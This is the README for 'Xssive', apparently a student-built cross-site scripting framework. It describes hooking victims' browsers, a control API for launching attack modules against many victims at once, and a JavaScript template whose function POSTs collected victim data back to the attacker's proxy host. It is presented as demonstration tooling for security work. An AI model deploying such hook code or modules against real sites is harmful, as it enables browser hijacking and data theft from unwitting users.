__ __ _
\ \/ /___ ___(_)_ _____
\ // __/ __| \ \ / / _ \
/ \\__ \__ \ |\ V / __/
/_/\_\___/___/_| \_/ \___|
Demonstration Framework 0.1
The Xssive Framework is a tool written in python that not only demonstrates cross site scripting vulnerabilities, it also allows a security professional easily manage and launch escalated attacks on multiple different hooked targets simultaneously. This tool was developed using web.py; a minimalist python based web framework. All of the libraries I used in development are Free and open source. There are many tools out there that use similar techniques, most of them are better. I aimed to allow multiple different interfaces take advantage of this tool such as a web page, irc bot, or a terminal based tool. It would also allow for simultaneous control by multiple different parties at once. This tool was developed as a 3rd year project in DCU. I will eventually provide demonstrative videos. As part of this project I have also written a terminal based gui control device that allows the using of this tool. Below I provide Installation instructions and a general user manual.
#Library Installation
#Xssive Installation Guide
#Architectural overview
#Writing your own attack modules
#Control device interface
#Simple Example control device
#Xssive help options
web.py - ( http://webpy.org ) This is a simple, lightweight, standalone python based web framework. I found it very easy to use and felt it would greatly suit the planned tools requirements. I have never used it before; the libraries website was very clear cut and contained many demonstrative examples. Installation instructions - ( http://webpy.org/install )
I installed it on my ubuntu 12.10 distribution using the following: wget http://webpy.org/static/web.py-0.37.tar.gz python setup.py install - in the extracted folder.
In order to use this tool you must have python2.7.3 installed. This tool was developed for Linux based operating systems, it could however be easily edited to function with other Operating Systems.
Step 1: Firstly download the Xssive.tar.gz which is available at the following location:
https://makthepla.net/Xssive.tar.gz
Step 2: Then you need to uncompress the Gzip by using the following command on Linux
$ tar -zxvf Xssive.tar.gz
Step 3: Xssive.py is the main xssive proxy server. It may be best to run this as root as it needs
to use web sockets. If not create a user with the appropriate permissions. It can be started using
one the following command.
$ sudo python Xssive.py
Step 4: When your tool is running you will be presented with the current host location/port and a
Control key (highlighted in red). This control key will be used by any control devices to interact
with the server.
Step 5: For a demonstration use the simple_control_device.py. The control device needs the
host location of the proxy server and the control key to be passed into it.
Troubleshoot: The demonstration control device uses this -H (host) in creating the Urls, make
sure the host has not got a final /
$ python simple_control_device.py -H http://theXssiveProxyHost -K 17b573eada554ba3b0613eb418094cd4
These diagrams offer a very clear overview of how the project functions and operates. In (a) below we can clearly see all of the architecture that is required for this tool to function. (b) Represents the flow of Data between these devices.
a.Architecture involved.
b.Data Flow Diagram
One of the major benefits of having this Xss framework, is the ability to make it easier to write useful javascript attack code. I provide brief instructions here of items available to you, should you choose to create some attack modules of your own. Place your modules in the modules folder. The general format for your attack code should look like the following.
NOTE: It must contain the attack_module variable (name of js file) if you want to store data.
1 /* Simple Prompt Module for Testing. */
2 var attack_module = 'alert.js';
3 //Malicious action here.
4 prompt(document.domain,'Xssive Framework 0.1');
5
6 //Store the attack data.
7 store_AttackData('Successful alert');
Useful available variables.
host_addr: This contains the host IP of the proxy server. victim_id: This contains the unique Victim id for the browser you have hooked. ctrl_key: This contains the control Api key that allows access to info or info storage.
Useful available functions.
store_AttackData(): This function proves very handy. I have included it in the hook code for use.
This will store whatever data you need into the attack_data database table. It creates the correct JSON format required by the Xssive server
to store attack information. It does this by performing an AJAX Jquery POST request to the proxy server, with the data stored inside.
It takes full advantage of the variables available above.
8 function store_AttackData(attdata){
9 //Creating JSON
10 var jsons = { att_data: [] };
11 jsons.att_data.push ({
12 "victimid": victim_id,
13 "module": attack_module,
14 "data": attdata
15 })
16
The JQuery POST Request looks like the following.
17 $.ajax({ type: "POST", url: "http://"+host_addr+"/Data/"+ctrl_key,
18 dataType: "json", data: JSON.stringify(jsons) ,
19 success: function (data){
20 var obj = $.parseJSON(data); //obj will contain response data.
21 }
22 });
23 }
The Control device could come in a variety of forms, all you need to be able to use this interface is parse JSON from urls or send JSON commands in a POST request. It is essential for your control device to also be able to use the control key that is generated on starting the Xssive proxy server. The Control key is an md5 that is generated upon starting the server. You also need the address of your server which is also available through the same means. Pulling JSON Victim Data: This information is available at the following url.
http:// HOST /Data/ ControlKey
There are two groups of data represented by the json, one is the "attack" information, this contains information that was retrieved in recent attacks. The next set is the "hooked" information which includes all the data for victims currently hooked by your hook code. Sending JSON Commands: It is possible to remotely send the Xssive server commands. These could come from curl requests or a control device you have created. The commands should be sent to the following address.
http:// HOST /Command/ ControlKey
There are various commands a control device can carry out. These commands are parsed from the following JSON format.
JSON success or fail data will also be presented.
{ "command": "Launch"- Launch an attack module. (This requires a victimid and a module name.)
"List_Mod"- This will return a json list of the attack modules.
"Clear"- This unhooks all victims.
"Delete"- Remove a loaded module (This requires a victimid and a module name.),
"victimid": 1 - Carry out attack on a single user.
"0,4" - Carry out attacks on a range of victims.
"module": "module.js" - The module to load., }
This Control device is named simple_control_tool.py, It is included in the package. It was the tool I made solely for testing purposes. Below you will see it is a very simple terminal based app.
This is the main menu.
This is an example of one of the sub-menus
The following is just an example of some capture data.
There is a help menu available when you run the Xssive.py file which is the main server.
Use the -h argument. You will be presented with the following information.
Xssive Demonstration Framework
optional arguments:
-h, --help Show this help message and exit
-p PORT Specify a port.
-H HOST Specify where to run proxy server. Default is the current host.
-v Display example injection vectors.
-mysql DBINFO Provide information for an external Database to use in the format
"host,user,passwd,db". By default this tool will use a local SQLite database.
-db FILE Provide a named SQLite database to use.
-page PAGE Provide a webpage , the contents will be displayed at the
/Page location.For use with attack code.